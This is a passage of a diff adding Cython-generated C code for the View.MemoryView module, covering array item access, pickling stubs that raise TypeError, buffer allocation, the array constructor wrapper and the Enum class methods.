__pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_t_1, __pyx_v_item); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 235, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + +/* Python wrapper */ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /*proto*/ +static int __pyx_array___setitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item), ((PyObject *)__pyx_v_value)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setitem__", 0); + + /* "View.MemoryView":238 + * + * def __setitem__(self, item, value): + * self.memview[item] = value # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (unlikely((PyObject_SetItem(__pyx_t_1, __pyx_v_item, __pyx_v_value) < 0))) __PYX_ERR(1, 238, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "View.MemoryView":237 + * return self.memview[item] + * + * def __setitem__(self, item, value): # <<<<<<<<<<<<<< + * self.memview[item] = value + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.__setitem__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_array___reduce_cython__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_array_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_array_2__setstate_cython__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + +static int __pyx_array_allocate_buffer(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_v_i; + PyObject **__pyx_v_p; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + Py_ssize_t __pyx_t_3; + Py_ssize_t __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_allocate_buffer", 0); + + /* "View.MemoryView":254 + * cdef PyObject **p + * + * self.free_data = True # <<<<<<<<<<<<<< + * self.data = malloc(self.len) + * if not self.data: + */ + __pyx_v_self->free_data = 1; + + /* "View.MemoryView":255 + * + * self.free_data = True + * self.data = malloc(self.len) # <<<<<<<<<<<<<< + * if not self.data: + * raise MemoryError, "unable to allocate array data." + */ + __pyx_v_self->data = ((char *)malloc(__pyx_v_self->len)); + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + __pyx_t_1 = (!(__pyx_v_self->data != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":257 + * self.data = malloc(self.len) + * if not self.data: + * raise MemoryError, "unable to allocate array data." # <<<<<<<<<<<<<< + * + * if self.dtype_is_object: + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_array_data, 0, 0); + __PYX_ERR(1, 257, __pyx_L1_error) + + /* "View.MemoryView":256 + * self.free_data = True + * self.data = malloc(self.len) + * if not self.data: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate array data." + * + */ + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":260 + * + * if self.dtype_is_object: + * p = self.data # <<<<<<<<<<<<<< + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + */ + __pyx_v_p = ((PyObject **)__pyx_v_self->data); + + /* "View.MemoryView":261 + * if self.dtype_is_object: + * p = self.data + * for i in range(self.len // self.itemsize): # <<<<<<<<<<<<<< + * p[i] = Py_None + * Py_INCREF(Py_None) + */ + if (unlikely(__pyx_v_self->itemsize == 0)) { + PyErr_SetString(PyExc_ZeroDivisionError, "integer division or modulo by zero"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + else if (sizeof(Py_ssize_t) == sizeof(long) && (!(((Py_ssize_t)-1) > 0)) && unlikely(__pyx_v_self->itemsize == (Py_ssize_t)-1) && unlikely(__Pyx_UNARY_NEG_WOULD_OVERFLOW(__pyx_v_self->len))) { + PyErr_SetString(PyExc_OverflowError, "value too large to perform division"); + __PYX_ERR(1, 261, __pyx_L1_error) + } + __pyx_t_2 = __Pyx_div_Py_ssize_t(__pyx_v_self->len, __pyx_v_self->itemsize); + __pyx_t_3 = __pyx_t_2; + for (__pyx_t_4 = 0; __pyx_t_4 < __pyx_t_3; __pyx_t_4+=1) { + __pyx_v_i = __pyx_t_4; + + /* "View.MemoryView":262 + * p = self.data + * for i in range(self.len // self.itemsize): + * p[i] = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * return 0 + */ + (__pyx_v_p[__pyx_v_i]) = Py_None; + + /* "View.MemoryView":263 + * for i in range(self.len // self.itemsize): + * p[i] = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * return 0 + * + */ + Py_INCREF(Py_None); + } + + /* "View.MemoryView":259 + * raise MemoryError, "unable to allocate array data." + * + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * p = self.data + * for i in range(self.len // self.itemsize): + */ + } + + /* "View.MemoryView":264 + * p[i] = Py_None + * Py_INCREF(Py_None) + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":248 + * + * @cname("__pyx_array_allocate_buffer") + * cdef int _allocate_buffer(array self) except -1: # <<<<<<<<<<<<<< + * + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._allocate_buffer", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + +static struct __pyx_array_obj *__pyx_array_new(PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, char *__pyx_v_format, char *__pyx_v_c_mode, char *__pyx_v_buf) { + struct __pyx_array_obj *__pyx_v_result = 0; + PyObject *__pyx_v_mode = 0; + struct __pyx_array_obj *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("array_cwrapper", 0); + + /* "View.MemoryView":270 + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. # <<<<<<<<<<<<<< + * + * if buf is NULL: + */ + if (((__pyx_v_c_mode[0]) == 'f')) { + __Pyx_INCREF(__pyx_n_s_fortran); + __pyx_t_1 = __pyx_n_s_fortran; + } else { + __Pyx_INCREF(__pyx_n_s_c); + __pyx_t_1 = __pyx_n_s_c; + } + __pyx_v_mode = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + __pyx_t_2 = (__pyx_v_buf == NULL); + if (__pyx_t_2) { + + /* "View.MemoryView":273 + * + * if buf is NULL: + * result = array.__new__(array, shape, itemsize, format, mode) # <<<<<<<<<<<<<< + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + */ + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_t_3); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_v_mode); + __pyx_t_1 = 0; + __pyx_t_3 = 0; + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_4, NULL)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 273, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":272 + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + * + * if buf is NULL: # <<<<<<<<<<<<<< + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":275 + * result = array.__new__(array, shape, itemsize, format, mode) + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) # <<<<<<<<<<<<<< + * result.data = buf + * + */ + /*else*/ { + __pyx_t_3 = PyInt_FromSsize_t(__pyx_v_itemsize); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyBytes_FromString(__pyx_v_format); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_v_shape); + __Pyx_GIVEREF(__pyx_v_shape); + PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_shape); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_t_4); + __Pyx_INCREF(__pyx_v_mode); + __Pyx_GIVEREF(__pyx_v_mode); + PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_mode); + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_allocate_buffer, Py_False) < 0) __PYX_ERR(1, 275, __pyx_L1_error) + __pyx_t_3 = ((PyObject *)__pyx_tp_new_array(((PyTypeObject *)__pyx_array_type), __pyx_t_1, __pyx_t_4)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 275, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_result = ((struct __pyx_array_obj *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "View.MemoryView":276 + * else: + * result = array.__new__(array, shape, itemsize, format, mode, allocate_buffer=False) + * result.data = buf # <<<<<<<<<<<<<< + * + * return result + */ + __pyx_v_result->data = __pyx_v_buf; + } + __pyx_L3:; + + /* "View.MemoryView":278 + * result.data = buf + * + * return result # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_result); + __pyx_r = __pyx_v_result; + goto __pyx_L0; + + /* "View.MemoryView":268 + * + * @cname("__pyx_array_new") + * cdef array array_cwrapper(tuple shape, Py_ssize_t itemsize, char *format, char *c_mode, char *buf): # <<<<<<<<<<<<<< + * cdef array result + * cdef str mode = "fortran" if c_mode[0] == b'f' else "c" # this often comes from a constant C string. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.array_cwrapper", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XDECREF((PyObject *)__pyx_v_result); + __Pyx_XDECREF(__pyx_v_mode); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + +/* Python wrapper */ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_MemviewEnum___init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_name = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_name,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_name)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 304, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(1, 304, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + } + __pyx_v_name = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 304, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.Enum.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self), __pyx_v_name); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__", 0); + + /* "View.MemoryView":305 + * cdef object name + * def __init__(self, name): + * self.name = name # <<<<<<<<<<<<<< + * def __repr__(self): + * return self.name + */ + __Pyx_INCREF(__pyx_v_name); + __Pyx_GIVEREF(__pyx_v_name); + __Pyx_GOTREF(__pyx_v_self->name); + __Pyx_DECREF(__pyx_v_self->name); + __pyx_v_self->name = __pyx_v_name; + + /* "View.MemoryView":304 + * cdef class Enum(object): + * cdef object name + * def __init__(self, name): # <<<<<<<<<<<<<< + * self.name = name + * def __repr__(self): + */ + + /* function exit code */ + __pyx_r = 0; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + +/* Python wrapper */ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_MemviewEnum___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(((struct __pyx_MemviewEnum_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":307 + * self.name = name + * def __repr__(self): + * return self.name # <<<<<<<<<<<<<< + * + * cdef generic = Enum("") + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->name); + __pyx_r = __pyx_v_self->name; + goto __pyx_L0; + + /* "View.MemoryView":306 + * def __init__(self, name): + * self.name = name + * def __repr__(self): # <<<<<<<<<<<<<< + * return self.name + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_MemviewEnum_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + 